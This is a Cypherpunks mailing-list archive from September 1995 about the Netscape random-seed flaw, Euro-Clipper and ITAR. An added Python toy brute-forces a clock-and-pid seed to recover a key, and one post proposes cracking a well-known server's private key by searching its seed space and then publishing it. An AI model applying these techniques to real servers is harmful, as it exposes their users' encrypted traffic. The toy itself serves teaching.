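A toy of the seed-space problem that runs through this thread (Tim May's "tiger teams", the question of whether the attacker needs the PID, and the later proposal to search the RNG seed space), as an added example. It is not Netscape's generator, which nobody in the thread shows; keygen_weak is a hypothetical key generator seeded only from the clock and the process id, with the exhaustive search such a seed invites. The function names, the timestamp and pid used in the demo, and the SHA-256 stand-in for the generator are this example's own.

```python
"""Why a small seed space is fatal: a hypothetical generator and the search.

Added example; not Netscape's code (the thread does not show it).  The weak
generator derives a 128-bit key from (seconds, pid) only.  An attacker who
knows roughly when the key was made and the pid, or the pid's range, does
not need to break anything: they enumerate the seeds.
"""
import hashlib
import math
import os


def keygen_weak(seconds: int, pid: int) -> bytes:
    """Hypothetical toy: the 'key' is fully determined by two small numbers.
    SHA-256 here only stands in for whatever expansion the generator does;
    it does not add a single bit of entropy."""
    seed = (seconds << 16) | (pid & 0xFFFF)
    return hashlib.sha256(seed.to_bytes(8, "big")).digest()[:16]


def keygen_strong() -> bytes:
    """Seed from the OS random source instead; there is no seed space to
    search, so the search below cannot even be started."""
    return hashlib.sha256(os.urandom(32)).digest()[:16]


def seed_entropy_bits(window_seconds: int, pid_candidates: int) -> float:
    """Upper bound on the weak seed's entropy: log2 of the number of
    (seconds, pid) pairs the attacker has to try."""
    return math.log2(window_seconds * pid_candidates)


def recover_seed(observed_key: bytes, t_lo: int, t_hi: int, pids):
    """The search step: regenerate the key for every candidate seed and stop
    at the first match.  Returns (seconds, pid) or None.  Knowing the pid
    (a program that leaks it narrows this a lot) shrinks the loop to the
    time window alone."""
    for secs in range(t_lo, t_hi + 1):
        for pid in pids:
            if keygen_weak(secs, pid) == observed_key:
                return secs, pid
    return None


if __name__ == "__main__":
    # Constructed demo values: a 1995-era epoch time and an arbitrary pid.
    t0, pid = 811_700_000, 27131
    key = keygen_weak(t0, pid)
    print("entropy if pid unknown, 60 s window: %.1f bits"
          % seed_entropy_bits(60, 32768))
    print("recovered:", recover_seed(key, t0 - 30, t0 + 30, range(1, 32768)))
```

A 60-second window times 32768 pids is about 21 bits, so the whole search is a few hundred thousand hash calls; the thread's "net-wide search" only becomes necessary when the window and the other seed inputs are larger, and it becomes impossible when the seed comes from a real random source.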
From patrick at Verity.COM Thu Sep 21 09:38:36 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 09:38:36 PDT
Subject: netscape bug
Message-ID: <9509211634.AA18472@cantina.verity.com>

Vlad Nuri said (with some excerpting)

> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?

It's been noted on this list before that some programs give uid information out...sendmail comes to mind...this GREATLY narrows the search for a pid.

> P.M. notes that anywhere there is a data-driven buffer overflow (which
> he suspects are all over netscape) he can get code to execute anything
> he wants. this reminds me of the
> Morris internet worm that ran exactly the same way. it used a
> bug in the finger demon that caused a string buffer overwrite
> (via strcpy, instead of strncpy) to execute customized code.
>
> my question: I have not seen the specifics of how this works. does
> this require specialized knowledge of the native machine language on the
> host machine? or is it just used to cause something like a core dump
> to get a command line or something like that?

It requires knowledge of how the stack is set up and of assembler for the target. Most people in computer science know at least one assembler and could easily add enough of another to launch an attack like this. I did one once to attack one of my programs as an example for a class. Please don't overestimate the difficulty of this attack or underestimate the number of folks out there that are qualified to launch it. It's just that most of us would rather be writing constructive code :)

Patrick

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
|                                                            (\          |
| Patrick J. Horgan        Verity Inc.
\\  Have   |
| patrick at verity.com     1550 Plymouth Street               \\ _ Sword |
| Phone : (415)960-7600    Mountain View                      \\/  Will  |
| FAX   : (415)960-7750    California 94303                  _/\\ Travel |
\___________________________________________________________\)__________/

From sameer at c2.org Thu Sep 21 09:42:02 1995
From: sameer at c2.org (sameer)
Date: Thu, 21 Sep 95 09:42:02 PDT
Subject: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <199509211636.JAA12440@infinity.c2.org>

> Or is the banking industry whipping up hysteria among
> purchasers to curb fraud losses? Was the work of those
> graduate students funded by someone -- directly or indirectly?
> If so, by whom? A banking consortium? A high-tech company
> working on some patentable security scheme?

Do free t-shirts count as funding?

-- 
sameer                                     Voice: 510-601-9777
Community ConneXion                        FAX: 510-601-9734
An Internet Privacy Provider               Dialin: 510-658-6376
http://www.c2.org (or login as "guest")    sameer at c2.org

From wb8foz at netcom.com Thu Sep 21 09:52:22 1995
From: wb8foz at netcom.com (David Lesher)
Date: Thu, 21 Sep 95 09:52:22 PDT
Subject: Council of Europe proposes to outlaw strong encryption (fwd)
Message-ID: <199509211649.MAA11243@netcom22.netcom.com>

**********************************************************
> SUBJECT: Euroclipper
> Apologies if this is old news to you folks, but thought I should
> pass it on.

Date: Thu, 21 Sep 1995 00:42:39 -0400
Subject: IP: Council of Europe proposes to outlaw strong encryption

According to an article in `Communications Week International', the 34-nation Council of Europe has agreed to outlaw strong encryption products which do not make keys available to governments. The article, `Euro-Clipper chip scheme proposed', is on the front page of the magazine's issue 151, dated 18th September, which arrived in my mail this morning.
It relates that the policy was approved on the 8th September at Strasbourg by the Council, and coincides with an attempt by the European Commission to propose a pan-European encryption standard. The Council - unlike the Commission - has no statutory powers to enforce its recommendations. However, Peter Csonka, the chairman of the committee that drafted the document (and an administrative officer at the Council's division of crime problems) says that `it is rare for countries to reject Council of Europe recommendations'.

The proposal would make telecomms operators responsible for decrypting traffic and supplying it to governments when asked. It would also `change national laws to enable judicial authorities to chase hackers across borders'.

Opposition to this measure was expressed by Mike Strezbek, VP responsible for European telecomms at JP Morgan, who said that his organisation `will challenge any attempt to limit the power of our network encryption technologies very strongly'.

Csonka said that the Council had given consideration to business interests but had tried to strike a balance between privacy and justice. However, `it remains possible that cryptography is available to the public which cannot be deciphered,' his document says. `This might lead to the conclusion to put restrictions on the possession, distribution, or use of cryptography.'

Apparently another international organisation, the OECD, has called a conference of its members in December to devise a strategy on encryption.

I for one will be making clear to my MP that his stand on this issue will determine how I cast my ballot at the next election. I note that John Major stated in a 1994 parliamentary written reply to David Shaw MP that the government did not intend to legislate on data encryption. I am disappointed that government policy has changed to the point of supporting the Council of Europe, and that this change has sneaked through during the parliamentary recess.
Ross Anderson

------- End of Forwarded Message

-- 
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close...........(v)301 56 LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead........vr vr vr vr.................20915-1433

From s675570 at aix2.uottawa.ca Thu Sep 21 09:53:32 1995
From: s675570 at aix2.uottawa.ca (s675570 at aix2.uottawa.ca)
Date: Thu, 21 Sep 95 09:53:32 PDT
Subject: FROM A FRIEND . . . (or the joys of boating)

On Thu, 21 Sep 1995, Landon Dyer wrote:

> naturally, commuting to canada is probably a *lot* cheaper than
> owning a boat. the uninitiated have little idea what these holes-
> in-the-water really cost.... :-)

*Loud* chuckles. Who says you have to *own* the boat? (haha)

A suitably paid Canadian boat-captain could easily testify that you arrived every day to the boat with your trusty laptop, to develop your software within Canada. The disk with your saved code on it never left the boat. When you finished your development, you used a borrowed satellite phone to call up your ISP in Canada (we're talking physical Canada, not virtual, maritime, and bullshit Canada) to post your code and uuencoded executables to sci.crypt, and alt.test. And since you used a satellite phone, for the modem transmission, no US phone lines were used (a cellphone wouldn't do).

Of course you wouldn't actually have to do any of this. The gentleman just has to say it in court. The truth, the whole truth and nothing but.

From tcmay at got.net Thu Sep 21 10:04:39 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 10:04:39 PDT
Subject: Persistent Services Needed

One of the problems we're facing with "Cypherpunks" services is that they are catch-as-catch-can, or, bluntly, "flaky." Archive sites stop being archives, remailers vanish overnight (*), and other experiments pop up and then vanish with regularity.
(My favorite example, and one which always makes me smile, is the example of a remailer in Europe a couple of years ago which became inoperative with the message: "The foo remailer will stop operating tonight because I have to take my laptop with me for the summer to Portugal.")

I'm not criticizing these folks. Rather, I'm just saying something pretty obvious, that _persistence_ is important. This probably means commercialization, or formalized business relationships. With such persistent business set-ups, "the show must go on."

Another reason for digital money.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Thu Sep 21 10:17:24 1995
From: tcmay at got.net (Timothy C. May)
Date: Thu, 21 Sep 95 10:17:24 PDT
Subject: FROM A FRIEND . . . (the joys of boating)

At 4:00 PM 9/21/95, Landon Dyer wrote:
> here's a possible bullshit wrinkle. i'm not a lawyer, but one of my
>bosses was, once.
>
> said boss owned a boat that was of canadian registry. he was a
>canadian citizen with a green card.
>he *claimed* that, even when
>docked in the SF bay area, his boat was technically considered
>canadian territory, due to some maritime law malarkey. US authorities
>theoretically had to go through various hoops to legally board his
>vessel.
>
> i wouldn't try to halt a SWAT team, or even the local fuzz, with
>this tidbit of legal gaga. but doing crypto development on such a
>vessel might hold up in court for something as squishy as ITAR.

I'm skeptical of this, as boating friends of mine tell me they are much more easily boarded by the various water.cops who check for compliance with navigation laws, with drug laws, with Customs laws, etc. Within the 3-mile limits, or further out (?), broad discretion is given to the water.cops who tell you to "Prepare to be boarded." That a ship or boat is of Panamanian, Liberian, or even Canadian registry does not seem to have any effect on enforcement of drug-smuggling, gun-running, waste-dumping, or reckless-maneuvering laws.

I've already expressed my views on the hype surrounding the "This T-Shirt Has Been Declared to be a Munition" hoopla, so I won't draw the obvious inference about whether someone wearing an RSA-in-Perl t-shirt while scrubbing their decks will be shot on sight. (Was Randy Weaver's wife wearing an illegal t-shirt? Hmmmhhh, many conspiracy angles here!)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From joe_tardo at genmagic.com Thu Sep 21 10:23:32 1995
From: joe_tardo at genmagic.com (Joe Tardo)
Date: Thu, 21 Sep 95 10:23:32 PDT
Subject: netscape bug

Reply to: RE>netscape bug

"Vladimir Z. Nuri" writes:

>I am willing to bet that the netscape bug would have been fixed quickly if it
>had been quietly brought to their attention, without the blaring media
>lights (I enjoy the media circus as much as the next guy, but on the
>other hand, doing some things quietly may actually advance the cypherpunk
>cause further than by making a noisy hullaballoo in cyberspace).

I can't speak for Netscape in particular, but from bitter personal experience (in a previous life) I would be more willing to bet that bringing such a flaw to management's attention would raise the priority a bit to perhaps just below whatever their equivalent of the 'cut line' is. The rationale: "we are so resource limited; can't we just keep it under wraps and fix it in the next release?" just rings in my ears.

I can really empathize with what the developers at Netscape must be going through, but the 'social good' of raising security flaws to the level of the front page of the NYT is hard to deny. Rather than saying "security through obscurity is bad" you can point to a precedent of the consequences of being found out.
--Joe

From cwe at Csli.Stanford.EDU Thu Sep 21 10:28:51 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Thu, 21 Sep 95 10:28:51 PDT
Subject: Euro-Clipper
In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
Message-ID: <199509211728.KAA19754@Csli.Stanford.EDU>

| I don't think I've seen this here (but it was on a bunch of security
| newsgroups...)
|
| - Ian

It's time for a European wing of the cypherpunks list. Europeans - unite! :-(

And they even have the indecency to immediately propose to outlaw 'strong encryption for the people' - no grace period there.

/Christian

From cwe at Csli.Stanford.EDU Thu Sep 21 10:35:26 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Thu, 21 Sep 95 10:35:26 PDT
Subject: NSA and Netscape Crack
In-Reply-To: <43qrpq$gd5@tera.mcom.com>
Message-ID: <199509211735.KAA19988@Csli.Stanford.EDU>

| Believe it or not we don't like being trashed for
| being stupid all over the net, print media, and TV. As far as I know
| the NSA have not given us any advice about how to make our system
| stronger. I've heard rumors that they were quite upset when they
| learned that SSL's 40-bit RC4 was actually 40-bit secret and 88-bit salt.

It is dangerous that the general reaction is that of 'them being stupid', since that will prevent others from stepping forward and revealing their own 'holes'.

I decree that 'all holes look stupid once located'. But 'any non-trivially large program is bound to have holes' => 'all programmers are stupid' (except me, because I found the hole?)

Jeff, your and Netscape's prompt response to this is what counts - holes will always be uncovered, it's the time before they are patched that really matters.
/Christian

From patrick at Verity.COM Thu Sep 21 10:36:16 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 10:36:16 PDT
Subject: netscape's response (source code review)
Message-ID: <9509211732.AA18490@cantina.verity.com>

> It is becoming gradually clearer in cryptanalysis that you can't test
> security of pieces in isolation. Their interaction with the
> surrounding code and protocols is key to their security.
>
> Ross

I don't think this is a new realization, attacks on crypto systems have always considered the whole system.

_______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;). \
|                                                            (\          |
| Patrick J. Horgan        Verity Inc.                        \\  Have   |
| patrick at verity.com     1550 Plymouth Street               \\ _ Sword |
| Phone : (415)960-7600    Mountain View                      \\/  Will  |
| FAX   : (415)960-7750    California 94303                  _/\\ Travel |
\___________________________________________________________\)__________/

From sameer at c2.org Thu Sep 21 11:30:56 1995
From: sameer at c2.org (sameer)
Date: Thu, 21 Sep 95 11:30:56 PDT
Subject: Persistent Services Needed
Message-ID: <199509211825.LAA23576@infinity.c2.org>

c2.org has been around for more than a year. The recent publicity we've been getting should hopefully mean that we'll actually start making a profit and be around for quite some time longer.

-- 
sameer                                     Voice: 510-601-9777
Community ConneXion                        FAX: 510-601-9734
An Internet Privacy Provider               Dialin: 510-658-6376
http://www.c2.org (or login as "guest")    sameer at c2.org

From rr251070 at hvcc.edu Thu Sep 21 11:31:35 1995
From: rr251070 at hvcc.edu (Anarchist)
Date: Thu, 21 Sep 95 11:31:35 PDT
Subject: Has anyone seen the CatMan (catburgler)?

I am trying to find someone who calls himself catman or catburgler. In nov. 94 he was serving in Albany County Jail in NY. If anyone has any information that may help, like his E-mail address, I'd really like to hear from you... My address is below.
**********************************************
Email: rr251070 at academ.hvcc.edu
Email alias: Anarchist
At: Hudson Valley Community College
80 Vandenburgh Ave
Troy, NY 12180
----------------------------------------------
Anarchy- A movement to rid society of structured government, and to create a system based on co-operation and non-violence!
**********************************************

From sameer at c2.org Thu Sep 21 11:37:06 1995
From: sameer at c2.org (sameer)
Date: Thu, 21 Sep 95 11:37:06 PDT
Subject: The Next Hack
Message-ID: <199509211832.LAA24086@infinity.c2.org>

Now that we've seen that Netscape is doing a good job towards trying to fix the hole that Ian and David have uncovered, it's time to start looking at new things.

Given the recent post to the www-security list that was forwarded here, it seems like just replacing the server may not work for all the secure servers out there-- keys may have to be replaced as well. Let's find out.

Proposal for action:

1) Reverse-engineer a server to see if the keygen phase uses a weak RNG seed. -- if so, determine the exact algorithm.

2) Organize a net-wide search over the space of the RNG seed to crack the private key of some well known secure server.

3) Release the private key to the net.

-- 
sameer                                     Voice: 510-601-9777
Community ConneXion                        FAX: 510-601-9734
An Internet Privacy Provider               Dialin: 510-658-6376
http://www.c2.org (or login as "guest")    sameer at c2.org

From tomw at orac.engr.sgi.com Thu Sep 21 11:46:24 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Thu, 21 Sep 95 11:46:24 PDT
Subject: Netscape closes up 1 3/8 today!
Message-ID: <199509211846.LAA04164@orac.engr.sgi.com>

In article, carolann at censored.org (Censored Girls Anonymous) writes:

> Lookit that! 416 trades and 11 times there was more
> buying pressure than selling pressure..
> The rumors of bug fix are outweighing the facts of the crack!
> I am totally amazed! But think company insiders are probably
> supporting the stock.
Holding up better than ascii armor, it is.

I think it probably has more to do with the fact that the name "Netscape" has been on the front page of every major newspaper in the US. I guess bad press is better than no press at all. And the press hasn't even been that bad.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything. -- Washington DC motto            | tomw at engr.sgi.com

From cwe at Csli.Stanford.EDU Thu Sep 21 11:53:38 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Thu, 21 Sep 95 11:53:38 PDT
Subject: Exchange random numbers (was: Re: netscape's response)
In-Reply-To: <199509210958.TAA10764@sweeney.cs.monash.edu.au>
Message-ID: <199509211852.LAA22259@Csli.Stanford.EDU>

| > Of course you have to be very careful, as you say. Did you see my
| > problem-section in the original letter? I included it above.
| ... [the referenced section elided by jirib] ...
|
| If I only ever give out a hash of my seed, and only ever *add* any received
| info to my seed (and stir it in well), how can anyone find out anything?
| (Apart from hash weaknesses.)

Giving out contribution:

    MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote

Taking in contribution:

    my_seed = my_seed XOR (select_low_bits(remote_contrib, contrib_width) << contrib_area)

You also need to keep track of who has contributed what, and how much. This might become a problem if you don't have a safe authentication mechanism, like basing the tracking on the IP-numbers etc. But I don't believe this is a real problem, since you always contribute 'entropy', not exact values. You need to know the exact state of the random generator to be able to predict how your contribution will affect the generator.

The boot-strap stage is actually the big problem still. But if the initial stages are 'random enough' to withstand a total crack, I guess the randomness gathered will increase rapidly, and increase the safety a lot.
| The only thing that remains is that I cannot really count on a stranger
| to actually give me something truly random. In fact, since at least
| one other person knows it, I shouldn't count any entropy from it at all.
|
| However, if I get e bits from each of n servers, and k of them are rogue,
| then I have e*(n-k) bits, ie e*n*(1-k/n). With a suitably conservative
| estimate of k/n, this should be acceptable.
|
| In any case, accepting donations of entropy cannot possibly reduce the
| amount of entropy I have, can it?

This isn't a problem as I see it, he'll only know what bits he flipped, not the actual state. I guess someone could mount an attack on the remote_contrib, finding the part of my_seed by bruting the remote_contrib that I submitted. But even if that is done, you'll only know a small part of the total seed. And the remote end can't choose which segment of my_seed that will be revealed.

I also see a problem if an attacker is controlling the whole environment, but this is no different from the original problem, and a lot more unlikely.

| > and that you should only give out approximately the same amount of
| > randomness to the neighbour, as you point out below.
| ...
|
| I'm not sure I follow this one. Why?
|
| If the neighbour is willing to trust me for more, and cannot possibly
| deduce my seed from the numbers ('cause it's a strong 1-way hash),
| the only thing it costs me is CPU time - it'd cost me more to keep
| track of who asked for how much when.

Well, the reason would be that if someone bruted your contribution, they would still have to guess the remaining part. Double safe! :-)

| ...
| > My approach solves part of the problem of "the observable local
| > environment" problem.
| ...
|
| Then again, you can always ping. With a well-chosen target, you get
| 10 bits raw from the first packet... Perhaps about 7 or 8 of actual
| usable entropy (and before you flame me, ping melb.dialix.oz.au).
Yes, but if one assumes that the algorithm to gather the seed is known, it's quite possible for someone else to do it at the same time as you do it, or even observe your ping packet req/reply. And how do you determine which 'random host' to ping?

| Part of this is that once the sources of randomness are sufficiently
| diverse, it's just easier for an attacker to modify your s/w.
| Especially if you never throw out your seed, so that all your interactions
| since the beginning are unfathomably stirred into your current key.

Yes, I believe this is important too.

/Christian

From bdavis at dg.thepoint.net Thu Sep 21 11:55:19 1995
From: bdavis at dg.thepoint.net (Brian Davis)
Date: Thu, 21 Sep 95 11:55:19 PDT
Subject: NSA and Netscape Crack

On Tue, 19 Sep 1995, Timothy C. May wrote:

> By the way, if we count our own Matt Blaze's work on exposing weaknesses of
> the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks
> achievement," then the Cypherpunks have actually played a dominant role in
> cracking these recent standards. (Not to mention the RC4 code postings, the
> various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations,
> etc.)
>
> Well done, of course!

Absolutely. And why not enter the PR fray by publicizing those successes? Press release/identify persons for followups/etc. (All with permission/participation of those who did it). Certainly, Cypherpunks has gotten press lately, and what I've seen has been good press. Capitalize on it.

Finally, I've got to say that, as someone new to the concepts discussed here, I found it extremely cool to read about the latest break here and then see it in the news a day or two later.

EBD

> --Tim May
>
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C.
May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^756839 | black markets, collapse of governments. > "National borders are just speed bumps on the information superhighway." > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From joe_tardo at genmagic.com Thu Sep 21 11:59:48 1995 From: joe_tardo at genmagic.com (Joe Tardo) Date: Thu, 21 Sep 95 11:59:48 PDT Subject: Please send me SSL prob Message-ID: Reply to: RE>>Please send me SSL problems... Jeff: The name chosen for SSL was, perhaps, unfortunate and misleading, but should not get in the way of the kind of service it provides. I keep combing the spec looking for socket-like api's, and so far have not found any :-). > I've looked at >what it takes to make some existing protocols work with SSL, and I'm not >convinced that its always appropriate. For example FTP and RCMD use >multiple connections, which is a royal pain. Doesn't HTTP use a new connection for every GET? > If a secure IP standard emerges that is widely deployed and provides >similar services, I don't see why SSL couldn't just go away (this is my >opinion, not an official position of netscape). The ipsec people are currently debating what it means to do replay detection on an unreliable datagram service, what it means to authenticate individual users in a layer that only knows how to name host endpoints, how a protocol specification deals with how policy would be set for mixed encryption service requirements, etc. This is not the first time these points have been debated in the history of the universe, nor the first attempt at a 'one size fits all' security protocol. 
I, personally, would not be too quick to expect IP security to solve all of your problems, but it will do a better job on, say, host-to-host disclosure protection. It will, however, require new kernel code or low-level driver or hardware hacks, which simultaneously provide the better protection and a barrier to security deployment for a product like Netscape's. Now, how about fixing SSL's keying so it has perfect forward secrecy? -Joe From shields at tembel.org Thu Sep 21 12:00:37 1995 From: shields at tembel.org (Michael Shields) Date: Thu, 21 Sep 95 12:00:37 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft In-Reply-To: <199509210637.XAA11478@hammerhead.com> Message-ID: > Now, this is all expected to change, to become more harmonious > with the rest of the world. The changes that I've heard are > 1) Go to first-to-file instead of first-to-invent [...] Does this mean that prior art would no longer invalidate a patent? -- Shields. From shields at tembel.org Thu Sep 21 12:03:13 1995 From: shields at tembel.org (Michael Shields) Date: Thu, 21 Sep 95 12:03:13 PDT Subject: Munitions shirt (again) In-Reply-To: Message-ID: > There is nothing in the ITAR that refers to ``machine-readable'' so > there is no need to interpret that term. The issue is that it has been formally used as the criterion that distinguishes "technical data" from "defense articles". See Phil Karn's CJ requests on the _Applied Cryptography_ book and floppy. -- Shields. From stewarts at ix.netcom.com Thu Sep 21 12:07:47 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 21 Sep 95 12:07:47 PDT Subject: Project: a standard cell random number generator Message-ID: <199509211907.MAA18413@ix.ix.netcom.com> At 02:50 PM 9/20/95 -0700, you wrote: > In this sense, NSA ought to be *encouraging* Intel and >IBM and Motorola to put "generate random bits" instructions into >their instruction sets... Is _that_ what was going on with Pentium division? 
Less seriously, though, a UART might be a good place to add a random number source, since it may be able to extract randomness from communication line jitter, is usually an easily replaceable part on most machines, and communicates at a higher speed than you're likely to need for most randomness applications. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Thu Sep 21 12:08:04 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 21 Sep 95 12:08:04 PDT Subject: MIME Message-ID: <199509211907.MAA18407@ix.ix.netcom.com> At 01:24 AM 9/21/95 +0000, shields at tembel.org (Michael Shields) wrote: >> >I think that it must be the content-type that is causing problems, >> Yes, I agree. Make it something like ASCII text >But it's not text/plain. It's PGP'ed text/plain. The only way to >indicate this in MIME is with a content-type. (Yes, they're working on >a general way to encapsulate encryption.) Part of the problem is that application/pgp is being used both for encrypted data and also for clearsigned data, which really have different handling needs. With clearsigned, you might want to read it, but might also want to PGP it. One possibility is to do multipart messages with the body in one part and a detached signature in another. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From an5877 at anon.penet.fi Thu Sep 21 12:38:49 1995 From: an5877 at anon.penet.fi (deadbeat) Date: Thu, 21 Sep 95 12:38:49 PDT Subject: Fraud Can Flourish Without the Internet Message-ID: <9509211915.AA28667@anon.penet.fi> -----BEGIN PGP SIGNED MESSAGE----- The New York Times Letters Thursday, September 21, 1995 Fraud Can Flourish Without the Internet To the Editor: Your Sept. 
19 front-page article on the discovery by two University of California graduate students of a flaw in Netscape, the software used for purchases over the Internet's World Wide Web, raises a number of obvious questions. First, who needs high tech to perpetrate fraud? Any unscrupulous commercial employee could use or sell your credit card number without employing technology. Every time you hand your card to a waiter in a restaurant, it disappears for several minutes. The department store clerks and gas station attendants you deal with also have access to your card number. How secure is that? Ever give your credit card number over the phone to make a purchase from a mail-order house? Or to secure a reservation at a hotel? Who's to say that the employees you're speaking with are honest? Or that your phone is not tapped? Or theirs? I shop on the Internet; I may get ripped off. What's my liability? Fifty bucks -- same as the other scenarios I've described. That's in my credit agreement with the card issuer. So why all the hoopla? Is credit card fraud significantly more prevalent on the Internet than in other modes of purchasing? Or is the banking industry whipping up hysteria among purchasers to curb fraud losses? Was the work of those graduate students funded by someone -- directly or indirectly? If so, by whom? A banking consortium? A high-tech company working on some patentable security scheme? ROBERT HERRIG Peekskill, N.Y., Sept. 19, 1995 The writer is a systems consultant. DEADBEAT for the I.L.F. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAgUBMGFgp/FZTpBW/B35AQFiuAF/c7DUidkXEe1oBdRpsmfzkXzii44qFPQ3 YQui2lORNA8RUaWiB25poSLFNdiBMJnX =duqf -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. 
Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From vznuri at netcom.com Thu Sep 21 12:46:43 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 21 Sep 95 12:46:43 PDT Subject: economic espionage (@#$%^&*) In-Reply-To: <9509201546405398@ci.diamond-bar.ca.us> Message-ID: <199509211936.MAA23834@netcom13.netcom.com> >> >It was said that Pres. Clinton had given a speech while >> >visiting the CIA HQ in Langley/Virginia. He allegedly >> >said in this speech that obtaining industrial >> >informations has the highest priority and this were the >> >new task for the spies. ah yes, just like the way Clinton alone came up with the whole Clipper idea as a way to balance the legitimate goals of law enforcement with the right to privacy in society. careful Bill, your strings are showing. and I won't say who is the puppeteer, but he has the initials N.S.A. pardon me, but this new "economic espionage" sleazoid-intelligence- agency-justifying bugaboo really annoys me. boy, I wish I could get my job to work the way the government works. I go to my boss, and say, "repeat after me: you will be given a fat raise because you are crucial to the company". I would *die* to see an op-ed in the NYT with the subject: "economic espionage: the new bogeyman decoy after the cold war" From liberty at gate.net Thu Sep 21 13:00:46 1995 From: liberty at gate.net (Jim Ray) Date: Thu, 21 Sep 95 13:00:46 PDT Subject: Munitions shirt (again) Message-ID: <199509211956.PAA20713@tequesta.gate.net> Dear Cypherpunks: I sent this yesterday, but it appears toad may have eaten it. Here it is again. JMR -----BEGIN PGP SIGNED MESSAGE----- Ian Goldberg wrote: >>So, any consensus as to whether it's actually illegal to do so? I >>remember some disagreement a few weeks ago that AFAIK wasn't resolved. And Tim replied: >The _consensus_ here seems to be: "This t-shirt is illegal to wear in front >of non-Americans," judging by the comments here. 
And since _I_ started all this trouble with a private e-mail to Futplex; I'll now jump in saying again, [IANAL]: "This t-shirt may or may not be illegal to wear in front of non-Americans," from my reading a while back of the dense text of this silly law, [I'll spare all of you a quote of it, but there's text that MIGHT be interpreted that way.] >The _reality_ is quite different, I think, and the "this shirt is illegal" >hype is, in my opinion, just that, hyperbole. I agree with Tim that actual enforcement of this silly a law is unlikely, especially in Ian's case right now, and *especially* during our US (election) "silly season," for obvious reasons. The availability of strong encryption is unlikely to be a major issue during this election cycle, despite Cypherpunk efforts, and enforcement of this dumb law would be a "gift" to those of us who think it should be. [I hope I'm wrong here, but I think you're safe, Ian.:)] >Even hyperbull, too. I wouldn't go *that* far, though. Poorly written, ambiguous, statist laws can be interpreted in any number of ways and for a variety of reasons having little (or nothing) to do with justice. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh iQCVAwUBMGBvrW1lp8bpvW01AQFj1AP8C1RKpayv6V15sTBLiFLWV4tlfWRUuLfm JVWgeUeHUFxBV1EttbGv30iTmwlCJmBab/wLUag9S57DLZ6Ajed7jQe0rpra56Nl OgmM1gGU8nJJazYeqiWbYrOc/VSheSqQVLAj+vOoufW8XnU1iFkXQnRziCcyO2Nc bto4hKBrFWY= =qlSx -----END PGP SIGNATURE----- Regards, Jim Ray "People are deceived in masses, but enlightened one at a time." -- Dick Boddie. ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 James Milton Ray ----------------------------------------------------------------------- Help Phil! 
